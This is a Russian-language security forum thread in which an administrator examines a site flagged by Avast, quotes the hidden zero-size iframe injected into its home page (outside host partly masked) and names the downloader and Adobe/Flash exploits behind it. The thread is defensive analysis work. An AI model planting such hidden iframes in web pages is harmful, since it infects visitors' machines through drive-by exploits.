Решена Прошу проверить israelmilitary.com, аваст ругается

Тема в разделе "Анализ сайтов на наличие вирусов", создана пользователем alfabravo, 2 авг 2009.

Статус темы:
Закрыта.
  1. alfabravo
    Оффлайн

    alfabravo Активный пользователь

    Сообщения:
    19
    Симпатии:
    0
    прошу проверить

    хтппп//www.israelmilitary.com[/url]
    прошу проверить
     
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.447
    Симпатии:
    13.950
    На главной iframe скрытый
    PHP:
    <iframe src="http://rey****.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://rey****.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    Добавлено через 3 минуты 11 секунд
    За которым скывается Trojan-Downloader.JS.Iframe.bmu

    Добавлено через 2 минуты 50 секунд
    Который пытается подгрузить в машину юзера зловреда, используя уязвимость в продуктах adobe.

    Добавлено через 2 минуты 7 секунд
    Точнее Exploit.Win32.Pidief.bes

    Добавлено через 6 минут 21 секунду
    И флеш ролик... пока детектиться только
    Sophos - Troj/SWFDlr-P
    McAfee - Exploit-CVE2007-0071

    Зловред на один и тот-же IP не срабатывает.
     
  3. alfabravo
    Оффлайн

    alfabravo Активный пользователь

    Сообщения:
    19
    Симпатии:
    0
    Спасибо большое! у меня Аваст,была ли возможность заражения? Что мне делать? Что хотел этот вирус в моей машине?
     
  4. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.447
    Симпатии:
    13.950
    Что загрузится после получения доступа неизвестно мне. Если хотите проверить машину, милости просим. Если Аваст сумел заблокировать, то, скорее всего заражения не произошло... но утверждать не берусь... сильно много факторов.
     
  5. alfabravo
    Оффлайн

    alfabravo Активный пользователь

    Сообщения:
    19
    Симпатии:
    0
    Спасибо! Да,Аваст свистел и давал сирены постоянно,закрывал все открытые мной там пункты и выдавал по три строчки предупреждений.
     
  6. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.447
    Симпатии:
    13.950
    Пришел ответ.
    39004936_132691494_youwhichsites.swf - Exploit.SWF.Downloader.oa

    Сайт добавлен в список опасных.
     
Статус темы:
Закрыта.

Поделиться этой страницей